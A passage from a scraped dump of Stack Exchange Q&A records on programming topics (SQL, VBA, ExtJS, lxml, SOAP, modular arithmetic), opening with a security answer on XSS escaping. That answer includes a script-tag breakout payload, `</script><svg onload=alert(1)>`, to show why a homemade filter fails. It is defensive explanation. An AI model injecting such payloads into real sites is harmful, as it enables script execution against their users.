\"ready\"}};\n<\/script>\n<\/code>\nIn this specific case, if I replace <code>\\<\/code> with <code>\\\\<\/code> and <code>\"<\/code> with <code>\\\"<\/code> is it possible to trick my filter? Of course the user input would be where USER INPUT is in my code.\nComment: Why don't you use an existing XSS filter?\nAnswer: \nIn this specific case, if I replace <code>\\<\/code> with <code>\\\\<\/code> and <code>\"<\/code> with <code>\\\"<\/code> is it possible to trick my filter?\n\nThat's not sufficient, your filter is insecure.\nE.g., one valid XSS attack vector would be <code><\/script><svg onload=alert(1)><\/code>, ending up with:\n<code><script>\nvar test = {src: \"test\", layer: {\"input\": \"<\/script><svg onload=alert(1)>\", \"event\": \"ready\"}};\n<\/script>\n<\/code>\nSince the XML (HTML) tree is parsed before any JS is evaluated, the closing script tag (<code><\/script><\/code>) will terminate the script despite being placed within a JS string.\nAnother problem with your filter are line breaks. 
If an attacker can insert a <code>0x0a<\/code> byte, they can break your script by causing a syntax error (since a double quoted string can't span multiple lines):\n<code><script>\nvar test = {src: \"test\", layer: {\"input\": \"\n\", \"event\": \"ready\"}};\n<\/script>\n<\/code>\nIf you're using PHP, a convenient filter function to work safely with user input inside JS is <code>json_encode()<\/code>. From this answer:\n\nWith plain PHP a common and safe approach is to use\n <code>json_encode()<\/code> as explained here. E.g.:\n<code>var foo = <?php echo json_encode($foo, JSON_HEX_QUOT|JSON_HEX_TAG|JSON_HEX_AMP|JSON_HEX_APOS); ?>\n<\/code>\n<code>json_encode()<\/code> returns the JSON representation of a value, hence it's\n guaranteed to evaulate to a valid object in your JS code and you can\n just assign it to a variable as shown. But don't omit the additional\n flags. Depending on the context, an attacker could otherwise use\n payloads like <code><\/script><\/code> to break out of the entire script tag.\nComment: Does json_encode escape though?\nComment: @immibis Yes, with the correct flags! (That's why I linked [this answer](https:\/\/security.stackexchange.com\/questions\/110101\/proper-way-to-protect-against-xss-when-output-is-directly-into-js-not-html\/110110#110110) that addresses this aspect.)\nComment: @Matthew how does that help?\nComment: Alternatively, it maybe be useful to use `` tags instead of trying to escape your json.\nComment: `\"}; \/**\/ \n ` works just fine, the entire contents of the script tag are treated as character data instead of html. `alert(json[\"myvalue\"]);` will now popup with ``\nComment: @Matthew An attacker can just terminate the CDATA section.\nComment: That is correct, all you need to do is escape CDATA within your content block (https:\/\/stackoverflow.com\/questions\/223652\/is-there-a-way-to-escape-a-cdata-end-token-in-xml) and that will work for any content that you want to be treated as character content, regardless of the underlying content, be it json, xml, etc.\nComment: @Matthew: cdata? that would only affect xhtml pages, haven't seen any of those in a while...\n","meta":{"source":"security.stackexchange","title":"XSS - double quote and backslash escaping","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google calendar ExtendedProperty filled by user\n\nQuestion: Short question:\nI have a google calendar in which the appointments get entered by a vb.net program. I am using the <code>ExtendedProperty<\/code> to fill a value to a variable. But it would be much easier if the google user could fill this value.\nLong question: I need to know if this appointment needs further action in the accounting software. So if the user would be able to tell in this google appointment: \"Yes, and phone client if order is finished\". 
Then I would be able to find this appointment and take action.\nI am using the <code>newEvent.Content<\/code>.<code>Content<\/code> variable for this, but this is errorprone as the user needs to fill in: \nYES#And phone client if order is ready#\n<code> Private Function GoogleAgendaAanmaken(ByVal GoogleEmail As String, ByVal GooglePassword As String, _\n ByVal Titel As String, ByVal Omschr As String, ByVal Locatie As String, _\n ByVal StartTijd As DateTime) As String\n\n GoogleAgendaAanmaken = \"\"\n Dim Id As String = Guid.NewGuid().ToString()\n\n Try\n\n Dim serv As CalendarService = GAuthenticate(GoogleEmail, GooglePassword)\n\n Dim newEvent As New Google.GData.Calendar.EventEntry\n newEvent.Title.Text = Titel\n newEvent.Content.Content = Omschr\n\n Dim Waar As New Google.GData.Extensions.Where()\n Waar.ValueString = Locatie\n newEvent.Locations.Add(Waar)\n\n Dim newTime As New Google.GData.Extensions.When()\n newTime.StartTime = StartTijd\n newTime.EndTime = DateAdd(DateInterval.Minute, 30, StartTijd)\n newEvent.Times.Add(newTime)\n\n Dim oExtendedProperty As New ExtendedProperty()\n oExtendedProperty.Name = \"SynchronizationID\"\n oExtendedProperty.Value = Id\n newEvent.ExtensionElements.Add(oExtendedProperty)\n\n Dim oExtendedProperty2 As New ExtendedProperty()\n oExtendedProperty2.Name = \"Unit4Acties\"\n oExtendedProperty2.Value = \"JA\"\n newEvent.ExtensionElements.Add(oExtendedProperty2)\n\n Dim newatom As AtomEntry\n Dim uri As New Uri(\"https:\/\/www.google.com\/calendar\/feeds\/\" & GoogleEmail & \"\/private\/full\")\n newatom = serv.Insert(uri, newEvent)\n GoogleAgendaAanmaken = Id\n\n Catch ex As Exception\n Call MessageBox.Show(ex.Message)\n End Try\n\n Return GoogleAgendaAanmaken\n\nEnd Function\n<\/code>\nI would like to know if it is possible to change the value of \"Unit4Acties\" in Google Calendar itself, by the user?\nThanks in advance,\nBrian \nComment: have you any code? at present, it is very hard\/impossible for anyone to answer this question accurately with only the details you have provided. Remember, we can't see what you have tried, we only can see the details you have posted above!\nAnswer: No, extended properties can only be written to using the API.\nComment: Thank you. I was afraid of this. (I can't click the upvote as I don't have 15 reputations, sorry)\n","meta":{"source":"stackoverflow","title":"Google calendar ExtendedProperty filled by user","dup_signals":{}},"subset":"stackexchange"} +{"text":"Center buttons horizontally of form\n\nQuestion: Can somebody help me to center the buttons horizontally of a form? 
I don't know how I can give a vbox layout with align center to the button items.\nThe following code is from Sencha Docs.\n<code>Ext.create('Ext.form.Panel', {\ntitle: 'Simple Form',\nbodyPadding: 5,\nwidth: 350,\n\n\/\/ The form will submit an AJAX request to this URL when submitted\nurl: 'save-form.php',\n\n\/\/ Fields will be arranged vertically, stretched to full width\nlayout: 'anchor',\ndefaults: {\n anchor: '100%'\n},\n\n\/\/ The fields\ndefaultType: 'textfield',\nitems: [{\n fieldLabel: 'First Name',\n name: 'first',\n allowBlank: false\n},{\n fieldLabel: 'Last Name',\n name: 'last',\n allowBlank: false\n}],\n\n\/\/ Reset and Submit buttons\nbuttons: [{\n text: 'Reset',\n handler: function() {\n this.up('form').getForm().reset();\n }\n}, {\n text: 'Submit',\n formBind: true, \/\/only enabled once the form is valid\n disabled: true,\n handler: function() {\n var form = this.up('form').getForm();\n if (form.isValid()) {\n form.submit({\n success: function(form, action) {\n Ext.Msg.alert('Success', action.result.msg);\n },\n failure: function(form, action) {\n Ext.Msg.alert('Failed', action.result.msg);\n }\n });\n }\n }\n}],\nrenderTo: Ext.getBody()\n});\n<\/code>\nI thank you very much for your support!\nKind regards, shub\nAnswer: I found the correct solution. You have to set only the \"buttonAlign\" config to center.\n<code>Ext.create('Ext.form.Panel', {\n title: 'Simple Form',\n bodyPadding: 5,\n width: 350,\n\n \/\/ The form will submit an AJAX request to this URL when submitted\n url: 'save-form.php',\n\n \/\/ Fields will be arranged vertically, stretched to full width\n layout: 'anchor',\n defaults: {\n anchor: '100%'\n },\n\n \/\/ The fields\n defaultType: 'textfield',\n items: [{\n fieldLabel: 'First Name',\n name: 'first',\n allowBlank: false\n },{\n fieldLabel: 'Last Name',\n name: 'last',\n allowBlank: false\n }],\n buttonAlign: 'center',\n\n \/\/ Reset and Submit buttons\n buttons: [{\n text: 'Reset',\n handler: function() {\n this.up('form').getForm().reset();\n }\n }, {\n text: 'Submit',\n formBind: true, \/\/only enabled once the form is valid\n disabled: true,\n handler: function() {\n var form = this.up('form').getForm();\n if (form.isValid()) {\n form.submit({\n success: function(form, action) {\n Ext.Msg.alert('Success', action.result.msg);\n },\n failure: function(form, action) {\n Ext.Msg.alert('Failed', action.result.msg);\n }\n });\n }\n }\n }],\n renderTo: Ext.getBody()\n});\n<\/code>\nAnswer: you can use \"bbar\" for this. check this.\n<code> bbar: {\n layout: 'auto',\n items: {\n xtype: 'container',\n autoEl: 'center',\n defaultType: 'button',\n items: [{\n text: 'Reset',\n handler: function() {\n this.up('form').getForm().reset();\n }},\n {\n text: 'Submit',\n formBind: true,\n \/\/only enabled once the form is valid\n disabled: true,\n handler: function() {\n var form = this.up('form').getForm();\n if (form.isValid()) {\n form.submit({\n success: function(form, action) {\n Ext.Msg.alert('Success', action.result.msg);\n },\n failure: function(form, action) {\n Ext.Msg.alert('Failed', action.result.msg);\n }\n });\n }\n }}]\n }\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"Center buttons horizontally of form","dup_signals":{}},"subset":"stackexchange"} +{"text":"T-SQL How to GROUP BY two fields and concatenate another\n\nQuestion: I'm trying to group on 2 fields and return a third field that is a concatenation of the values of another field that the first 2 have in common, with a given ProductID. 
Here is my data:\n<code>ProductID Currency Price Territory\n1 USD 6.99 US\n1 EUR 4.99 GR\n1 EUR 4.99 HU\n1 EUR 4.99 LT\n2 USD 7.99 US\n2 EUR 5.99 GR\n2 EUR 5.99 HU\n<\/code>\nI'd like results to come back like this:\n<code>ProductID Currency Price Territories\n1 USD 6.99 US\n1 EUR 6.99 GR, HU, LT\n<\/code>\nI can pull the Currenty and Price columns, but can't concatenate the Territories they have in common:\n<code>SELECT Currency, Price\nFROM TerritoryPricing\nWHERE ProductID = 1\nGROUP BY Currency, Price\n<\/code>\nHow can I concatenate the territories?\nComment: Google: \"SQL Server aggregate string concatenation\"\nComment: look this article http:\/\/stackoverflow.com\/questions\/3368942\/grouped-string-aggregation-listagg-for-sql-server\nComment: http:\/\/sqlperformance.com\/2014\/08\/t-sql-queries\/sql-server-grouped-concatenation\nAnswer: you can use Concat:\n<code>SELECT ProductID, Currency, Price, CONCAT(Territory)\nGROUP BY territory\nFROM employee_tbl;\n<\/code>\nor create a function with colace something like like this\n<code>CREATE FUNCTION [dbo].[terr]\n(\n @territoryID int\n)\nRETURNS varchar(max)\nAS\nBEGIN\n declare @output varchar(max)\n select @output = COALESCE(@output + ', ', '') + territory\n from TerritoryPricing\n where territoryid = @territoryID\n\n return @output\nEND\n\nGO\n\nSELECT UserID, [dbo].terr(territoryID)\nFROM TerritoryPricing\nGROUP BY territory\n\nGO\n<\/code>\nAnswer: Test this code\n<code>DECLARE @S VARCHAR(8000)\nSELECT \n Currency, \n Price , \n Territories = (Select @S = @S + Territory FROM TerritoryPricing as T2 WHERE T1.Currency = T2.Currency AND T1.Price = T2.Price) ,\n Empty = (select @S ='') \nFROM TerritoryPricing as T1\nWHERE ProductID = 1\nGROUP BY Currency, Price\n<\/code>\nAnswer: You can use SQL's XML processing to generate concatenated lists with SQL 2000 and up:\n<code>create table #TerritoryPricing ( ProductID int, Currency varchar(3), Price decimal(10,2), Territory varchar(2))\ninsert into #TerritoryPricing values (1,'USD',6.99,'US')\ninsert into #TerritoryPricing values (1,'EUR',4.99,'GR')\ninsert into #TerritoryPricing values (1,'EUR',4.99,'HU')\ninsert into #TerritoryPricing values (1,'EUR',4.99,'LT')\ninsert into #TerritoryPricing values (2,'USD',7.99,'US')\ninsert into #TerritoryPricing values (2,'EUR',5.99,'GR')\ninsert into #TerritoryPricing values (2,'EUR',5.99,'HU')\n\nSELECT Currency, Price,\n SUBSTRING(\n (SELECT ( ',' + ltrim(rtrim(Territory))) \n FROM #TerritoryPricing t2\n WHERE t1.Currency = t2.Currency \n and t1.Price = t2.Price\n and ProductID = 1\n ORDER BY t2.Territory\n FOR XML PATH('')\n ), 2, 8000) Territories\nFROM #TerritoryPricing t1\nWHERE ProductID = 1\nGROUP BY Currency, Price\n<\/code>\nComment: This is great, thank you. The only thing I had to add was a \"WHERE ProductID = 1\" in the subquery WHERE clause. Thanks!\n","meta":{"source":"stackoverflow","title":"T-SQL How to GROUP BY two fields and concatenate another","dup_signals":{}},"subset":"stackexchange"} +{"text":"How should one refer to the smallest remainders generated by a modulus within DH or DLP?\n\nQuestion: It's my understanding that the integer base and exponents chosen to create the initial public keys in DH are from the remainders of a modulus. \nFor example, if the value of the modulus is $N=11$, a set of remainders \"produced\" is <code>{0,1,2,3,4,5,6,7,8,9,10}<\/code>, however, I could also refer to the remainders of $N$ as <code>11,12,13,14,15,16,17,18,19,20,21<\/code>. 
\nIs there a way to differentiate by name the remainders <code>{0,1,2,3,4,5,6,7,8,9,10}<\/code>? \nFor example, is it accurate to refer to <code>{0,1,2,3,4,5,6,7,8,9,10}<\/code> as the canonical remainders of $\\pmod N$? If yes, then can I refer to a particular base used as the <code>canonical base<\/code> and the exponent used the <code>canonical exponent<\/code>? Or is there a different terminology for these elements? \nComment: Formally mathematicians consider the elements of $Z_n$ aka $Z\/nZ$ as congruence classes, but you are right we often represent and always(?) implement them using the integers 0..n-1, or 1.. for the multiplicative group, usually without saying so explicitly IME. The base or generator is a group element, but _exponents_ are effectively modulo (less than) the order of g, which is also the order of the subgroup generated by g; for n prime this is at most n-1, but may be less, sometimes substantially less.\nComment: I appreciate the insight and my intent in asking was to clarify and make explicit what seems to always be implicit. IMHO it seems confusing for someone trying to understand the internals of how DH works not to find a more definitive statement of which equivalence class is being used. Also, while I understand the literal meaning of you saying, \"The base or generator is a group element\", but doesn't the base also have to be within the remainder\/equivalence class as well? Finally, forgive my ignorance what does IME stand for :) ?\nComment: I don't know what you're asking by \"within the remainder\/equivalence class\". If we treat the mod-n elements (formally) as classes, then the base\/generator is one of them, i.e. it is a class which is an element of the class of classes. If we treat the mod-n elements as numbers 0..n-1, then the base\/generator is one of them. Either way it is one of the group elements. IME = in my experience.\nAnswer: The space $\\mathbb Z\/n\\mathbb Z$ is usually taken to consist of equivalence classes modulo $n$ called residue classes\u2014equivalence classes of integers under the equivalence relation $a \\sim b$ if and only if $n$ divides $a - b$. For example, $\\mathbb Z\/3\\mathbb Z$ consists of the three equivalence classes\n\\begin{align}\n 3\\mathbb Z &= \\{\\dots, -3, 0, 3, 6, \\dots\\}, \\\\\n 1 + 3\\mathbb Z &= \\{\\dots, -2, 1, 4, 7, \\dots\\}, \\\\\n 2 + 3\\mathbb Z &= \\{\\dots, -1, 2, 5, 8, \\dots\\}.\n\\end{align}\nResidue classes are sometimes also called cosets in group theory.\nAny set of distinct representatives of all the equivalence classes modulo $n$ is called a complete residue system modulo $n$. For example, $\\{0,1,2\\}$ is a complete residue system modulo 3, as is $\\{99,-26,-1\\}$.\nUsually if we want to choose particular representatives for computation, we choose the least nonnegative residues like $\\{0,1,2\\}$, where each number is taken to represent the equivalence class it is an element of.\nThere are also more exciting systems like Montgomery residues in radix $r$, where a coset $a + n\\mathbb Z$ is represented by the integer $a \\cdot r^{-1} \\bmod n$, where $r^{-1}$ is an integer such that $r \\cdot r^{-1} \\equiv 1 \\pmod n$. 
For instance, in radix 8, modulo 5 we have the representatives\n\\begin{align}\n 0 &\\mapsto 0 + 5\\mathbb Z, \\\\\n 2 &\\mapsto 1 + 5\\mathbb Z, \\\\\n 4 &\\mapsto 2 + 5\\mathbb Z, \\\\\n 1 &\\mapsto 3 + 5\\mathbb Z, \\\\\n 3 &\\mapsto 4 + 5\\mathbb Z.\n\\end{align}\nThis peculiar-looking function has the property that we can compute a representative of its image by $$\\rho(x) = \\bigr(x + n\\cdot[(x \\bmod r) \\cdot n' \\bmod r]\\bigr)\/r,$$ where the only divisor involved in the computation is $r$. Here $n' n \\equiv 1 \\pmod r$, and the result is either the least nonnegative residue modulo $n$, or the next one greater, so you can get the least nonnegative residue with a single conditional subtraction. The form $a \\cdot r^{-1}$ is preserved by addition and subtraction, $(a \\pm b) \\cdot r^{-1} = a \\cdot r^{-1} \\pm b \\cdot r^{-1}$, and while it is not preserved by multiplication, it can be restored by evaluating $\\rho$: $$(a \\cdot b) \\cdot r^{-1} = \\rho\\bigl((a \\cdot r^{-1}) \\cdot (b \\cdot r^{-1})\\bigr).$$ This technique is called Montgomery multiplication. When $r$ is a natural machine word size like $2^{32}$, this representation can be considerably faster without timing side channels than reduction modulo a general odd $n$.\nComment: @poncho oops, fixed\n","meta":{"source":"crypto.stackexchange","title":"How should one refer to the smallest remainders generated by a modulus within DH or DLP?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to associat a model to itself in a Many to Many way using Sails.js\/Waterline?\n\nQuestion: I have a sails.js project and I need a Model to be connected to itself as many to many, is it possible?\nAnswer: Yes(ish)\nYou can create a second model (for the purpose of the association). The second model would reference the same table as the first model and then you just create an association the way you normally would.\n","meta":{"source":"stackoverflow","title":"How to associat a model to itself in a Many to Many way using Sails.js\/Waterline?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set default value on a custom property\n\nQuestion: I have created a longstring custom property that gives me a XHTML editor. So far so good but I need help with two things.\nFirst, I would like to fill the property with a default value. I've looked at a couple of blog post about this but can't seem to get it right.\nSecond, I would want to render the custom property as a regular <code>textbox<\/code> that can hold a large string.\n<code>public class CustomerTypeBoxControl :\n EPiServer.Web.PropertyControls.PropertyLongStringControl\n{\n protected override void SetupEditControls()\n {\n base.SetupEditControls(); \n }\n\n public CustomerTypeBox CustomerTypeBox\n {\n get\n {\n return PropertyData as CustomerTypeBox;\n }\n }\n}\n\n[Serializable]\n[PageDefinitionTypePlugIn]\npublic class CustomerTypeBox : EPiServer.Core.PropertyLongString\n{\n public override IPropertyControl CreatePropertyControl()\n {\n return new CustomerTypeBoxControl();\n }\n}\n<\/code>\nComment: Can you just use a page builder type?\nComment: When you add the property to the page, does it give you the options to disable all the rich editor abilities like bold and italic? 
If you turn them all off, you simply have a long string editor.\nAnswer: Don't know if it is steel relevant but here is the solution:\n<code>TextBox _textBox;\nprotected override void SetupEditControls()\n{\n base.SetupEditControls();\n\n _textBox = (TextBox)EditControl;\n var value = CustomerTypeBox.Value ?? string.Empty;\n if (String.IsNullOrEmpty(value.ToString()))\n {\n _textBox.Text = \"Default text\";\n }\n else\n {\n _textBox.Text = value.ToString();\n }\n if (_textBox != null) EditControl.Parent.Controls.Add(_textBox);\n}\n\npublic override void ApplyEditChanges()\n{\n var customerTypeBoxValue = _textBox.Text;\n\n if (customerTypeBoxValue != null)\n {\n SetValue(customerTypeBoxValue);\n }\n}\n<\/code>\nDefault value for property is also possible to set in admin mode.\n","meta":{"source":"stackoverflow","title":"Set default value on a custom property","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using lxml to process html from requests. TypeError: can't pickle _ElementUnicodeResult objects\n\nQuestion: I am trying to get data found at a specific xpath on a page. I am able to get to the page via requests. I have verified I am at the correct page by using r.text to print the source code to my screen and comparing the displayed text to the text I am looking for. \nr.text returns a string that is difficult to extract the info I want out of. I have been informed lxml is the way to go in order to search for info by xpath. Unfortunately, I am getting a type error. \n<code>from lxml import html\nimport requests\n\npayload = {'login_pass': 'password', 'login_user': 'username','submit':'go'}\nr = requests.get(\"website\", params=payload)\n\nprint r.encoding\ntree = html.fromstring(r.text)\nprint tree\nprint tree.text_content()\n<\/code>\nreturns\n<code>UTF-8\n<Element html at 0x10dab8d08>\n\nTraceback (most recent call last):\n File \"\/Users\/Me\/Documents\/PYTHON\/GetImageAsPdf\/ImageToPDF_requests_beta.py\", line 11, in <module>\n print tree.text_content()\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/PyShell.py\", line 1343, in write\n return self.shell.write(s, self.tags)\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/rpc.py\", line 595, in __call__\n value = self.sockio.remotecall(self.oid, self.name, args, kwargs)\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/rpc.py\", line 210, in remotecall\n seq = self.asynccall(oid, methodname, args, kwargs)\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/rpc.py\", line 225, in asynccall\n self.putmessage((seq, request))\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/rpc.py\", line 324, in putmessage\n s = pickle.dumps(message)\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/copy_reg.py\", line 70, in _reduce_ex\n raise TypeError, \"can't pickle %s objects\" % base.__name__\nTypeError: can't pickle _ElementUnicodeResult objects\n<\/code>\nI tried checking the headers\n<code>r.headers\n<\/code>\nreturns \n<code>{'charset': 'utf-8',\n 'x-powered-by': 'PHP\/5.3.3',\n 'transfer-encoding': 'chunked',\n 'set-cookie': 'PHPSESSID=c6i7kph59nl9ocdlkckmjavas1; path=\/, LOGIN_USER=deleted; expires=Tue, 15-Oct-2013 15:12:08 GMT; path=\/',\n 'expires': 
'Thu, 19 Nov 1981 08:52:00 GMT',\n 'server': 'Apache\/2.2.15 (CentOS)',\n 'connection': 'close',\n 'pragma': 'no-cache',\n 'cache-control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0',\n 'date': 'Wed, 15 Oct 2014 15:12:09 GMT',\n 'content-type': 'text\/html; charset=UTF-8'}\n<\/code>\nMy goal is to be able to search the tree via xpath like this:\n<code>quantity = tree.xpath('\/html\/body\/form[1]\/table[3]\/tbody[1]\/tr\/td[2]\/table\/tbody\/tr\/td[1]\/table\/tbody\/tr\/td\/table[1]\/tbody\/tr[1]\/td[2]\/strong')\n<\/code>\nCan you please help me identify where I am going wrong? \nComment: Where are you running this code from? IDLE?\nComment: It looks like that error is happening because IDLE needs to pickle the contents of the command you're trying to run and send it to another process. If you run this script directly from the CLI, does it work ok?\nComment: yes I am using IDLE. Python 2.7.6. Mac OSx 10.8.5.\n\nI am using the IDLE that came built in with python when installed with homebrew.\nComment: yep. That seems to have done the trick. My goal of using that quantity line is not picking up any data by that xpath, but I suppose that is another issue all together. The tree is no longer returning an error so I am one step closer to success. Thank you.\nAnswer: You should be able to convert the <code>_ElementUnicodeResult<\/code> object into a regular, picklable unicode string.\nWith Python 2, simply wrap it with <code>unicode()<\/code>, e.g. <code>print unicode(tree.text_content())<\/code>\nAnd with Python 3, simply wrap it in <code>str()<\/code>, e.g. <code>str(tree.text_content())<\/code>\n","meta":{"source":"stackoverflow","title":"Using lxml to process html from requests. TypeError: can't pickle _ElementUnicodeResult objects","dup_signals":{}},"subset":"stackexchange"} +{"text":"Replacing GROUP BY by SELECT DISTINCT when not using aggregation function in SELECT\n\nQuestion: As a part of a past university assignment I was given this nested SQL statement:\n<code>SELECT DISTINCT P.playerId\nFROM Player P\nWHERE (\n SELECT COUNT(G.id)\n FROM Game G\n WHERE G.playerId = P.playerId\n) >10\n<\/code>\nThe task was to unnest the query. As preparation for the exams I now tried to solve this task again and came up with a solution similar to this (not 100% sure about the right syntax but I guess the intention is clear):\n<code>SELECT DISTINCT P.playerId\nFROM Player P, Game G\nWHERE G.playerId = P.playerId\nHAVING COUNT(G.id) >10\n<\/code>\nHowever, the official solution suggested this query:\n<code>SELECT P.playerId\nFROM Player P, Game G\nWHERE P.playerId = G.playerId\nGROUP BY P.playerId\nHAVING COUNT(G.id) > 10\n<\/code>\nSo, my question is, whether this would just be an alternative solution or whether it is just not possible to have a <code>SELECT DISTINCT<\/code> without <code>GROUP BY<\/code> when using <code>HAVING + aggregate function<\/code>? Essentially, the result of <code>SELECT DISTINCT<\/code> and <code>GROUP BY<\/code> should be the same but I'm just not sure about leaving out <code>GROUP BY<\/code> when using a <code>HAVING<\/code> clause.\nThanks in advance for any insights on this.\nAnswer: I think the best solution is:\n<code>SELECT G.playerId\nFROM Game G\nGROUP BY G.playerId\nHAVING COUNT(*) > 10;\n<\/code>\nThe <code>JOIN<\/code> is totally unnecessary. And if you do want to join, use <code>JOIN<\/code>, not a comma.\nComment: Ok, that makes sense. 
However, I guess that, despite a join being unnecessary in this case, the goal of the task was for us to unnest the query by using a join as it was explicitly asked to say why the specific type of join is important to unnest the query.\nComment: Most databases will not accept `HAVING` without a corresponding `GROUP BY`\nComment: @Samaranth . . . Very curious question for a query that only needs one table.\n","meta":{"source":"stackoverflow","title":"Replacing GROUP BY by SELECT DISTINCT when not using aggregation function in SELECT","dup_signals":{}},"subset":"stackexchange"} +{"text":"A list of tuples in VBA?\n\nQuestion: I am trying to basically do the equivalent of this in VBA:\n<code>myArray.apend((field1, field2, field3))\n<\/code>\n(using Python syntax)\nSo something where each element of the array\/list has three elements. Can this be done in VBA?\nComment: You can have arrays within arrays, if that is what you mean. Something like `myArray = Array(Array(field1, field2, field3), Array(...), ..., )`\nComment: I want the ability to add them dynamically, not just statically all in one line\nAnswer: To extend an array, use the <code>ReDim<\/code> statement:\n<code>Sub foo()\n'## Declares your array of len==1\nReDim myArray(0)\nmyArray(0) = Array(\"A\",\"B\",\"C\")\n'## Extends your array:\nReDim Preserve myArray(Ubound(myArray)+1)\nmyArray(Ubound(myArray)) = Array(\"item1\", \"item2\", \"item3\")\n\nEnd Sub\n<\/code>\nOf course, since the item you've added is also an array, you could use the <code>ReDim Preserve<\/code> on the individual array items, as per cyboashu's answer, but this may be somewhat tedious\/redundant. \n<code>Dim chld\ni = UBound(myArray)\n'Get a handle on the child array\nchld = myArray(i)\n'Extend it using ReDim Preserve\nReDim Preserve chld(UBound(chld) + 1)\n'Add another value to the new item:\nchld(UBound(chld)) = \"another value\"\n'Reassign back to the parent array\nmyArray(i) = chld\n<\/code>\nYou could also use the <code>System.Collections.ArrayList<\/code> object:\n<code>Sub f()\n\nDim myArrayList As Object\nDim i As Long\n\nSet myArrayList = ArrayList\n\n'Add ArrayList child objects to the ArrayList object:\nmyArrayList.Add ArrayList\ni = myArrayList.Count - 1\n'Add items to the child ArrayList:\nmyArrayList.Item(i).Add \"A\"\nmyArrayList.Item(i).Add \"B\"\nmyArrayList.Item(i).Add \"C\"\n\n'Add some more:\nmyArrayList.Add ArrayList\ni = myArrayList.Count - 1\nmyArrayList.Item(i).Add 1\nmyArrayList.Item(i).Add 2\nmyArrayList.Item(i).Add 3\n\n'Dump this in to a VBA Array, if needed:\nDim myArray\nmyArray = myArrayList.ToArray()\n\nEnd Sub\nFunction ArrayList()\n Set ArrayList = CreateObject(\"System.Collections.ArrayList\")\nEnd Function\n<\/code>\nScreenshot of the <code>.ToArray<\/code> output in the Locals window:\nAnswer: Jagged Arrays:\nExample:\n<code>Sub jaggedArray()\n\n Dim arrMaster()\n Dim arrChild()\n\n Dim lCtr As Long\n Dim lCtr2 As Long\n\n For lCtr = 1 To 5\n ReDim Preserve arrMaster(1 To lCtr)\n For lCtr2 = 1 To 3\n ReDim Preserve arrChild(1 To lCtr2)\n\n arrChild(lCtr2) = \"Child \" & lCtr2\n\n '\/ Assing array in to array\n arrMaster(lCtr) = arrChild\n\n Next\n Next\n\nEnd Sub\n<\/code>\n","meta":{"source":"stackoverflow","title":"A list of tuples in VBA?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Naming convention using java\n\nQuestion: So I have been building a soap message which takes elements and builds a soap structure. Don't be scared to take a stab at this if your unsure of this content. 
I'm looking for a changing variable name of some sort. All of the contents bellow are part of a line. Their can be several lines within a xml file so I have decided to loop it in an array, and insert them as an element individually. In the second chunk of code you can see \"CHANGINGVARIABLE\" however I do not know how to avoid this and keep inserting elements based on how many their are without predefining variables. Any tips or help would be greatly appreciated to make this work!\n<code>boolean finished = false; \/\/ true if there is no more item to process \n\nwhile(!finished) {\n String itemNumberz = eElement.getElementsByTagName(\"ItemNumber\").item(cnt).getTextContent();\n String receiptTypez = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String descriptionz = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String locationCodez = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String quantityz = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String UnitOfMeasurez = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String UnitCostz = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n\n listItemNumbers.add(itemNumberz);\n listReceiptTypes.add(receiptTypez);\n listDescriptions.add(descriptionz);\n listLocationCodes.add(locationCodez);\n listQuantitys.add(quantityz);\n listUnitOfMeasures.add(UnitOfMeasurez);\n listUnitCosts.add(UnitCostz);\n\n ++cnt;\n\n finished = (cnt >= eElement.getElementsByTagName(\"ItemNumber\").getLength());\n \/\/finished = (cnt >= eElement.getElementsByTagName(\"ReceiptType\").getLength());\n System.out.println(cnt);\n}\n\n\/\/ use them :\nint indexYouNeed = 1;\nString itemNumber44 = listItemNumbers.get(indexYouNeed);\n\/\/System.out.println(itemNumber44);\n<\/code>\nBelow is how I am applying them into the soap message.\n<code>while(cnt < 0) {\n String name = (cnt + \"add\");\n int[] CHANGINGVARIABLE = new int[cnt];\n CHANGINGVARIABLE[x] = someValue;\n\n SOAPElement CHANGINGVARIABLE = soapBodyElem7.addChildElement(\"LineItem\");\n\n SOAPElement soapBodyElem9 = CHANGINGVARIABLE.addChildElement(\"ItemNumber\");\n soapBodyElem9.addTextNode(listItemNumbers.get(cnt - 1));\n SOAPElement soapBodyElemaa = CHANGINGVARIABLE.addChildElement(\"ReceiptType\");\n soapBodyElemaa.addTextNode(listReceiptTypes.get(cnt - 1));\n SOAPElement soapBodyElemaaa = CHANGINGVARIABLE.addChildElement(\"Description\");\n soapBodyElemaaa.addTextNode(listDescriptions.get(cnt - 1));\n SOAPElement soapBodyElemaaaa = CHANGINGVARIABLE.addChildElement(\"Quantity\");\n soapBodyElemaaaa.addTextNode(listQuantitys.get(cnt - 1));\n SOAPElement soapBodyElemaaaaa = CHANGINGVARIABLE.addChildElement(\"UnitOfMeasurement\");\n soapBodyElemaaaaa.addTextNode(listUnitOfMeasures.get(cnt - 1));\n SOAPElement soapBodyElemaaaaaa = CHANGINGVARIABLE.addChildElement(\"UnitPrice\");\n soapBodyElemaaaaaa.addTextNode(listUnitCosts.get(cnt - 